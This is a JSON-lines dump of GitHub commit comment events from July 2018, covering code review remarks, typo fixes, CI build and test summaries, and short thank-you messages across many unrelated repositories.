{"id":"8015439887","type":"CommitCommentEvent","actor":{"login":"lvanderwesthuizen"},"repo":{"name":"lvanderwesthuizen/Landis-Gyr-Power-BI"},"payload":{"comment":{"id":29826711,"position":null,"line":null,"path":null,"commit_id":"dd4d56a81dcb392013f1c639b92f123674cacb5b","created_at":"2018-07-25T09:59:46Z","updated_at":"2018-07-25T09:59:46Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [FilteredUnitCharges](https://trello.com/c/teAGyeQ9/96-filteredunitcharges)"}},"created_at":"2018-07-25T09:59:46Z"}
{"id":"8015440786","type":"CommitCommentEvent","actor":{"login":"heinezen"},"repo":{"name":"SFTtech/openage"},"payload":{"comment":{"id":29826713,"position":null,"line":null,"path":null,"commit_id":"ccb5c3932d8a5217840132423a3f8f9c75b36cde","created_at":"2018-07-25T09:59:56Z","updated_at":"2018-07-25T09:59:56Z","author_association":"CONTRIBUTOR","body":"I think everything in the diagram has american english spelling (hopefully it is consistent too)."}},"created_at":"2018-07-25T09:59:56Z"}
{"id":"8019660953","type":"CommitCommentEvent","actor":{"login":"PastelMobileSuit"},"repo":{"name":"git-lfs/git-lfs"},"payload":{"comment":{"id":29837270,"position":11,"line":208,"path":"Makefile","commit_id":"edfcac99a18aa548bfcb4b09eeec5b83a0da8557","created_at":"2018-07-26T00:00:36Z","updated_at":"2018-07-26T00:00:36Z","author_association":"CONTRIBUTOR","body":"s/VERISON/VERSION"}},"created_at":"2018-07-26T00:00:36Z"}
{"id":"8019665114","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837279,"position":null,"line":null,"path":null,"commit_id":"f2973055f4db295609d7d4ae36d61229efb18057","created_at":"2018-07-26T00:02:08Z","updated_at":"2018-07-26T00:02:08Z","author_association":"NONE","body":"#6806-InconsistentConvectionCoeffs (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1697 of 1698 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nEnergyPlusFixture Test Summary\n * Passed: 652\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2973055f4db295609d7d4ae36d61229efb18057-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-26T00:02:08Z"}
{"id":"8019666697","type":"CommitCommentEvent","actor":{"login":"picabai"},"repo":{"name":"picabai/BiliHelper"},"payload":{"comment":{"id":29837282,"position":null,"line":null,"path":null,"commit_id":"18b330d5a28b8525ee1cbfdd916b5d4bad8c501c","created_at":"2018-07-26T00:02:41Z","updated_at":"2018-07-26T00:02:41Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-26T00:02:41Z"}
{"id":"8019673399","type":"CommitCommentEvent","actor":{"login":"xh00"},"repo":{"name":"iAuspicious/iauspicious.github.io"},"payload":{"comment":{"id":29837298,"position":null,"line":null,"path":null,"commit_id":"53c56ed75df02631c3b580528447c2dfc9e88aa6","created_at":"2018-07-26T00:05:09Z","updated_at":"2018-07-26T00:05:09Z","author_association":"NONE","body":"THEY'RE GOOD CUS ENCRYPTION :((("}},"created_at":"2018-07-26T00:05:09Z"}
{"id":"8019678892","type":"CommitCommentEvent","actor":{"login":"dataknut"},"repo":{"name":"dataknut/nzGREENGridDataR"},"payload":{"comment":{"id":29837305,"position":null,"line":null,"path":null,"commit_id":"2baabc101a23490aa2c3078525340a8ce00ab1c5","created_at":"2018-07-26T00:07:05Z","updated_at":"2018-07-26T00:07:05Z","author_association":"OWNER","body":"yah. But. They. Don't. And they even switch from d/m/y to y/m/d between file downloads without flagging.... So tell me what date is 17-06-16 when you have data being collected from 2014 - 2018?"}},"created_at":"2018-07-26T00:07:05Z"}
{"id":"8019679090","type":"CommitCommentEvent","actor":{"login":"JorgeFerrer"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29837307,"position":30,"line":5,"path":"discover/portal/articles/210-setting-up/02-instance-settings/01-virtual-instances.markdown","commit_id":"636625c3ea93a6a6e143030185a0277280aef7a6","created_at":"2018-07-26T00:07:10Z","updated_at":"2018-07-26T00:07:10Z","author_association":"NONE","body":"\"portal settings\" is not a thing any more :)\r\n\r\nMaybe you can say \"and it has been customized for a set of specific needs\"."}},"created_at":"2018-07-26T00:07:10Z"}
{"id":"8019679163","type":"CommitCommentEvent","actor":{"login":"jimvaughan"},"repo":{"name":"benjaminvaughan/itelescope"},"payload":{"comment":{"id":29837308,"position":44,"line":49,"path":"Encoder/encoder.py","commit_id":"2943500aeb6c60e479b8db3acfd2d54a6b354232","created_at":"2018-07-26T00:07:11Z","updated_at":"2018-07-26T00:07:11Z","author_association":"NONE","body":"Do you want callback_z to be called on both rising and falling edges?"}},"created_at":"2018-07-26T00:07:11Z"}
{"id":"8019681093","type":"CommitCommentEvent","actor":{"login":"JorgeFerrer"},"repo":{"name":"rbohl/liferay-docs"},"payload":{"comment":{"id":29837314,"position":36,"line":11,"path":"discover/portal/articles/210-setting-up/02-instance-settings/01-virtual-instances.markdown","commit_id":"636625c3ea93a6a6e143030185a0277280aef7a6","created_at":"2018-07-26T00:07:55Z","updated_at":"2018-07-26T00:07:55Z","author_association":"NONE","body":"Maybe be more specific and instead of just saying \"customization\" say \"custom developments as well as any system level configuration\""}},"created_at":"2018-07-26T00:07:55Z"}
{"id":"8019686736","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837333,"position":9,"line":9,"path":"ants.js","commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:10:02Z","updated_at":"2018-07-26T00:10:02Z","author_association":"NONE","body":"Hier ist es besser die Variablen vor der Parameterauswertung zu deklarieren und auf ein default (in diesem Fall let verboseMode = false;\r\nlet totSteps = 1;\r\n) zu setzen.\r\n\r\nVon der Verwendung von var wird in modernem JavaScript abgeraten, da es eine erhebliche Fehlergefahr mit sich bringt.\r\nFür eine detailiertere Erklärung des Problems z.B. https://medium.com/craft-academy/javascript-variables-should-you-use-let-var-or-const-394f7645c88f   bzw. https://hackernoon.com/js-var-let-or-const-67e51dbb716f"}},"created_at":"2018-07-26T00:10:02Z"}
{"id":"8019688026","type":"CommitCommentEvent","actor":{"login":"jralls"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29837337,"position":null,"line":null,"path":null,"commit_id":"04bdeb8321329e5ffe5a2ead4f792023a66d31b6","created_at":"2018-07-26T00:10:31Z","updated_at":"2018-07-26T00:10:31Z","author_association":"MEMBER","body":"Heh, this is just the first step of making a Mac release. Thanks for the donation."}},"created_at":"2018-07-26T00:10:31Z"}
{"id":"8019689107","type":"CommitCommentEvent","actor":{"login":"Ritikawesome"},"repo":{"name":"Ritikawesome/Hello-World"},"payload":{"comment":{"id":29837340,"position":null,"line":null,"path":null,"commit_id":"1d5857d90eef2cf20a03af3d33dd7b491b7c9e79","created_at":"2018-07-26T00:10:56Z","updated_at":"2018-07-26T00:10:56Z","author_association":"OWNER","body":"hkj"}},"created_at":"2018-07-26T00:10:56Z"}
{"id":"8019694635","type":"CommitCommentEvent","actor":{"login":"JoshClose"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29837352,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-26T00:12:59Z","updated_at":"2018-07-26T00:12:59Z","author_association":"NONE","body":"Awesome. Thanks so much."}},"created_at":"2018-07-26T00:12:59Z"}
{"id":"8019698536","type":"CommitCommentEvent","actor":{"login":"uluyol"},"repo":{"name":"uluyol/homebrew-core"},"payload":{"comment":{"id":29837357,"position":null,"line":null,"path":null,"commit_id":"c377e6ebb3c7bc8fe6edf098e259d76e9935aacf","created_at":"2018-07-26T00:14:28Z","updated_at":"2018-07-26T00:14:28Z","author_association":"OWNER","body":"Sorry, but I don't have the time to maintain a tap with this formula. I tried to submit this upstream in [this PR](https://github.com/Homebrew/homebrew-core/pull/24094), but it was rejected because of patching the codebase.\r\n\r\nIf you really need this, I'd suggest going to the R developers and asking them to fix the dependency. It looks like the only issue is their configure scripts using cairo-xlib.h instead of cairo.h, but to be honest I'm not familiar with the code. If they remove the dependency, I think the default homebrew R could probably enable cairo by default."}},"created_at":"2018-07-26T00:14:28Z"}
{"id":"8019698681","type":"CommitCommentEvent","actor":{"login":"jdalrymple"},"repo":{"name":"jdalrymple/node-gitlab"},"payload":{"comment":{"id":29837358,"position":null,"line":null,"path":null,"commit_id":"f4f1aeefd1d3bb2d400dbc12cc570278c45ba63e","created_at":"2018-07-26T00:14:32Z","updated_at":"2018-07-26T00:14:32Z","author_association":"OWNER","body":"Not really sure how to fix this lol. \r\n"}},"created_at":"2018-07-26T00:14:32Z"}
{"id":"8019704334","type":"CommitCommentEvent","actor":{"login":"samcv"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29837370,"position":null,"line":null,"path":null,"commit_id":"61d24ab2e2034650ef54e3ab92b5a52235b5219f","created_at":"2018-07-26T00:15:57Z","updated_at":"2018-07-26T00:15:57Z","author_association":"MEMBER","body":"Great work going the full mile on issue https://github.com/perl6/doc/issues/1045"}},"created_at":"2018-07-26T00:15:57Z"}
{"id":"8019705336","type":"CommitCommentEvent","actor":{"login":"stephenhmarsh"},"repo":{"name":"uluyol/homebrew-core"},"payload":{"comment":{"id":29837373,"position":null,"line":null,"path":null,"commit_id":"c377e6ebb3c7bc8fe6edf098e259d76e9935aacf","created_at":"2018-07-26T00:16:21Z","updated_at":"2018-07-26T00:16:21Z","author_association":"NONE","body":"ah, good to know, thanks @uluyol "}},"created_at":"2018-07-26T00:16:21Z"}
{"id":"8019706693","type":"CommitCommentEvent","actor":{"login":"apdaglian"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29837376,"position":null,"line":null,"path":null,"commit_id":"04bdeb8321329e5ffe5a2ead4f792023a66d31b6","created_at":"2018-07-26T00:16:53Z","updated_at":"2018-07-26T00:16:53Z","author_association":"NONE","body":"When I say \"programming amateur\" I mean \"Yesterday was the first time I ever opened Terminal.\" I'll leave this to people who know what they're doing, though I can't say I'm not intrigued.\r\nWhere's a good place to start learning this stuff?"}},"created_at":"2018-07-26T00:16:53Z"}
{"id":"8019708140","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"ximinez/rippled"},"payload":{"comment":{"id":29837377,"position":null,"line":null,"path":null,"commit_id":"df1738699f17e69f6caae5459931697d7d08f9eb","created_at":"2018-07-26T00:17:24Z","updated_at":"2018-07-26T00:17:24Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/ximinez/rippled/commit/df1738699f17e69f6caae5459931697d7d08f9eb)\n\nBuilt at __20180726 - 00:17:24__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 604s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/coverage.txt) | 1035 cases, 0 failed, t: 699s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 801s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 254s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 191s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 498s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 151s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 341s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 358s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1303s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 250s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/ed-rippled/job/txq_doc/23//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 540s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-26T00:17:24Z"}
{"id":"8019709120","type":"CommitCommentEvent","actor":{"login":"bmukheja"},"repo":{"name":"nuagenetworks/visualization-framework"},"payload":{"comment":{"id":29837380,"position":null,"line":null,"path":null,"commit_id":"e8019245f8b50fe42bddca2f6a3b3d18cc62ab87","created_at":"2018-07-26T00:17:48Z","updated_at":"2018-07-26T00:17:48Z","author_association":"COLLABORATOR","body":"*rectangular NOT oval"}},"created_at":"2018-07-26T00:17:48Z"}
{"id":"8019711516","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29837383,"position":21,"line":108,"path":"Testscripts/Linux/perf_fio.sh","commit_id":"ca26118f97e8e244df0fd7342d66019947bfa924","created_at":"2018-07-26T00:18:43Z","updated_at":"2018-07-26T00:18:43Z","author_association":"COLLABORATOR","body":"typo"}},"created_at":"2018-07-26T00:18:43Z"}
{"id":"8019712725","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29837387,"position":null,"line":null,"path":null,"commit_id":"5c85ed64fb4492a0d0a1c197b246208afcd1ad34","created_at":"2018-07-26T00:19:12Z","updated_at":"2018-07-26T00:19:12Z","author_association":"NONE","body":"158069813_#5675 (Nigusse) - Win64-Windows-7-VisualStudio-14: OK (2948 of 2948 tests passed, 623 test warnings)\n\nMessages:\n\n * 623 tests had: EIO diffs.\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-5c85ed64fb4492a0d0a1c197b246208afcd1ad34-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-26T00:19:12Z"}
{"id":"8019714243","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29837391,"position":null,"line":null,"path":null,"commit_id":"9e31d07ecc08a64372dd562e843c3d8950d24985","created_at":"2018-07-26T00:19:49Z","updated_at":"2018-07-26T00:19:49Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/30/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/master/30//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/master/9e31d07ecc08a64372dd562e843c3d8950d24985/30/jenkins-results/api-diff/index.html)\nℹ️ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/master/9e31d07ecc08a64372dd562e843c3d8950d24985/30/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/master/9e31d07ecc08a64372dd562e843c3d8950d24985/30/jenkins-results/generator-diff/index.html) (only version changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/master/9e31d07ecc08a64372dd562e843c3d8950d24985/30/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-26T00:19:49Z"}
{"id":"8019714261","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29837392,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-26T00:19:49Z","updated_at":"2018-07-26T00:19:49Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-26T00:19:49Z"}
{"id":"8019715770","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29837394,"position":10,"line":100,"path":"Testscripts/Linux/perf_fio.sh","commit_id":"ca26118f97e8e244df0fd7342d66019947bfa924","created_at":"2018-07-26T00:20:25Z","updated_at":"2018-07-26T00:20:25Z","author_association":"COLLABORATOR","body":"SLES12 and 15 should have the same root path in URL."}},"created_at":"2018-07-26T00:20:25Z"}
{"id":"8019715853","type":"CommitCommentEvent","actor":{"login":"Ben-Zvi"},"repo":{"name":"apache/drill"},"payload":{"comment":{"id":29837395,"position":null,"line":null,"path":null,"commit_id":"9d86cb53f33b51acbe17bcd9f404e75161aef913","created_at":"2018-07-26T00:20:27Z","updated_at":"2018-07-26T00:20:27Z","author_association":"CONTRIBUTOR","body":"Oops; missed this manual step; too late to change now ...\r\n"}},"created_at":"2018-07-26T00:20:27Z"}
{"id":"8019719195","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29837399,"position":12,"line":102,"path":"Testscripts/Linux/perf_fio.sh","commit_id":"ca26118f97e8e244df0fd7342d66019947bfa924","created_at":"2018-07-26T00:21:47Z","updated_at":"2018-07-26T00:21:47Z","author_association":"COLLABORATOR","body":"if $DISTRO is not SLES 12 or 15, it should be exception. Need initialize variable for exeptional handling"}},"created_at":"2018-07-26T00:21:47Z"}
{"id":"8019721933","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837414,"position":40,"line":40,"path":"ants.js","commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:22:51Z","updated_at":"2018-07-26T00:22:51Z","author_association":"NONE","body":"Die Idee mit der blackPoint Liste ist sehr gut (besonders für große Schrittzahlen, ist das reine Führen einer Punkteliste sehr viel effizienter als das Führen eines playingfield Arrays mit neuanpassung des Arrays beim Verlassen des Bereichs. \r\nAufgrund der Eigenschaften von Javascript empfiehlt es sich hier statt eines einfachen Arrays (deklariert mit  [] ) ein Objekt ( deklariert mit {} ) mit den Koordinaten als Index zu nutzen. Die Ursache ist dabei die interne Verwaltung von Objekten durch Hashmaps, die einen deutlich effizienteren Zugriff erlauben.\r\nDas Einfügen in die Liste wäre dann durch:\r\n blackPoints[[x,y]] = [x,y];  \r\nund Entfernen durch: \r\ndelete  blackPoints[[x,y]];\r\nmöglich.\r\n\r\nAuf die Verwaltung des großen Spielfeldarrays kann dabei sogar verzichtet werden, indem man einfach prüft ob ein Punkt bereits in  blackPoints enthalten ist.\r\nif  (blackPoints[[x,y]])\r\n{\r\n  <Handlung bei schwarz gefärbten Feld x,y>\r\n} else {\r\n <Handlung bei weißen>\r\n}\r\n"}},"created_at":"2018-07-26T00:22:51Z"}
{"id":"8019722607","type":"CommitCommentEvent","actor":{"login":"jralls"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":29837415,"position":null,"line":null,"path":null,"commit_id":"04bdeb8321329e5ffe5a2ead4f792023a66d31b6","created_at":"2018-07-26T00:23:08Z","updated_at":"2018-07-26T00:23:08Z","author_association":"MEMBER","body":"Not here. ;-)\r\nThere are adult education opportunities available in most developed countries, look for something in your area.\r\n"}},"created_at":"2018-07-26T00:23:08Z"}
{"id":"8019723143","type":"CommitCommentEvent","actor":{"login":"juhlee-microsoft"},"repo":{"name":"LIS/LISAv2"},"payload":{"comment":{"id":29837416,"position":10,"line":100,"path":"Testscripts/Linux/perf_fio.sh","commit_id":"ca26118f97e8e244df0fd7342d66019947bfa924","created_at":"2018-07-26T00:23:20Z","updated_at":"2018-07-26T00:23:20Z","author_association":"COLLABORATOR","body":"OK, the line numner 109 is what Simon mentioned. but here is not. You need to keep consistent URL pattern."}},"created_at":"2018-07-26T00:23:20Z"}
{"id":"8019741285","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837453,"position":59,"line":59,"path":"ants.js","commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:30:25Z","updated_at":"2018-07-26T00:30:25Z","author_association":"NONE","body":"Für den Code von hier bis Zeile 98 kann man darüber nachdenken dies als eigene Funktion (z.B, moveant) auszukopplen. \r\nDadurch wird der Code besser lesbar werden (Ich persönlich nehme zum Beispiel die Faustregel: Wenn es bei normaler Formatierung nicht mehr auf einen Bildschirm passt, ist es vermutlich zu lang und sollte in abtrennbare Funktionen zerlegt werden) "}},"created_at":"2018-07-26T00:30:25Z"}
{"id":"8019741657","type":"CommitCommentEvent","actor":{"login":"xlyu2006"},"repo":{"name":"xlyu2006/jake"},"payload":{"comment":{"id":29837454,"position":null,"line":null,"path":null,"commit_id":"cd3cf6be951c1acd6a17b2acddd7022a5443c14d","created_at":"2018-07-26T00:30:34Z","updated_at":"2018-07-26T00:30:34Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-26T00:30:34Z"}
{"id":"8019744283","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837461,"position":116,"line":116,"path":"ants.js","commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:31:37Z","updated_at":"2018-07-26T00:31:37Z","author_association":"NONE","body":"Durch den Trick von oben blackPoints[[x,y]] = [x,y] könnte auf das Parse verzichtet werden :)"}},"created_at":"2018-07-26T00:31:37Z"}
{"id":"8019746177","type":"CommitCommentEvent","actor":{"login":"zanderxyz"},"repo":{"name":"zanderxyz/veil"},"payload":{"comment":{"id":29837471,"position":null,"line":null,"path":null,"commit_id":"cbeefe925d115fc8dda10ca495aa241c27f03a57","created_at":"2018-07-26T00:32:24Z","updated_at":"2018-07-26T00:32:24Z","author_association":"OWNER","body":"Thanks very much!"}},"created_at":"2018-07-26T00:32:24Z"}
{"id":"8019747520","type":"CommitCommentEvent","actor":{"login":"mconnew"},"repo":{"name":"mig42/wcf"},"payload":{"comment":{"id":29837478,"position":5,"line":54,"path":"src/System.Private.ServiceModel/src/System/ServiceModel/Channels/HttpChannelFactory.cs","commit_id":"c931e26671d5df4ee96762c1a9c68989390a3406","created_at":"2018-07-26T00:32:57Z","updated_at":"2018-07-26T00:32:57Z","author_association":"NONE","body":"@mig42, is there a problem you need help with?"}},"created_at":"2018-07-26T00:32:57Z"}
{"id":"8019748310","type":"CommitCommentEvent","actor":{"login":"gmanlan"},"repo":{"name":"mlpack/mlpack"},"payload":{"comment":{"id":29837481,"position":null,"line":null,"path":null,"commit_id":"4b33dbbb04a39dfea65306c724ccf07f35d41a59","created_at":"2018-07-26T00:33:17Z","updated_at":"2018-07-26T00:33:17Z","author_association":"CONTRIBUTOR","body":"Looks good to me!"}},"created_at":"2018-07-26T00:33:17Z"}
{"id":"8019750532","type":"CommitCommentEvent","actor":{"login":"mdepaly"},"repo":{"name":"uk-hsm/exercise"},"payload":{"comment":{"id":29837490,"position":111,"line":111,"path":"ants.js","commit_id":"bf81db7c1d9c71ef3af40c78c92e6bde4ef24737","created_at":"2018-07-26T00:34:07Z","updated_at":"2018-07-26T00:34:07Z","author_association":"NONE","body":"Es gibt mindestens eine Variante, sich den Aufwand weitestgehend zu sparen und das Aufbauen des Spielfeldes  (falls verbose aus ist) nur einmal pro Programmaufruf tun zu müssen. "}},"created_at":"2018-07-26T00:34:07Z"}
{"id":"8019754380","type":"CommitCommentEvent","actor":{"login":"dtws1135"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29837500,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-26T00:35:35Z","updated_at":"2018-07-26T00:35:35Z","author_association":"NONE","body":"\n\n https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610 commitcomment - 29828660\n发自网易邮箱大师\nOn 7/25/2018 21:44，Duke7467<notifications@github.com> wrote：\n2018-07-25 16:09, oraclepeng yazmış:\n> like it\n>\n> --\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub [1], or mute the\n> thread [2].\n>\n> Links:\n> ------\n> [1]\n> https://github.com/iride2020/iRide-Token/commit/8f810b3700a24de0ee4f945ef84be7b2f1605610#commitcomment-29828660\n> [2]\n> https://github.com/notifications/unsubscribe-auth/Amq_C8sPr5g4VpHmBFOSYtZ1D8M41icjks5uKG4DgaJpZM4VaEAl\n\n\nDue7467 user is mine. can you send me??\n\n\n—\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2018-07-26T00:35:35Z"}
{"id":"8019758007","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29837506,"position":null,"line":null,"path":null,"commit_id":"60ab9bc60e661c20e74d0818da979a93aca21496","created_at":"2018-07-26T00:37:05Z","updated_at":"2018-07-26T00:37:05Z","author_association":"CONTRIBUTOR","body":"Ridley??"}},"created_at":"2018-07-26T00:37:05Z"}
{"id":"8019758942","type":"CommitCommentEvent","actor":{"login":"spodermenpls"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29837509,"position":null,"line":null,"path":null,"commit_id":"9a26baf5c1fc35ae3dc6d3af57a8c93cead73cc9","created_at":"2018-07-26T00:37:29Z","updated_at":"2018-07-26T00:37:29Z","author_association":"CONTRIBUTOR","body":"Und ich hab' mich immer gewundert, wieso sich Fehler immer nur außerhalb des Codes einschleichen.. also doch nur ein Verdienst der Technik. 😄"}},"created_at":"2018-07-26T00:37:29Z"}
{"id":"8019760886","type":"CommitCommentEvent","actor":{"login":"Nisnow"},"repo":{"name":"HHSProgrammingClub/smash-my-buttons"},"payload":{"comment":{"id":29837519,"position":25,"line":39,"path":"src/characters/Character.java","commit_id":"86b9f1872a9f3e2c802e1b52f64489b0cfe06106","created_at":"2018-07-26T00:38:16Z","updated_at":"2018-07-26T00:38:16Z","author_association":"CONTRIBUTOR","body":"> Body tushie = new Body();\r\n\r\nLol wut"}},"created_at":"2018-07-26T00:38:16Z"}
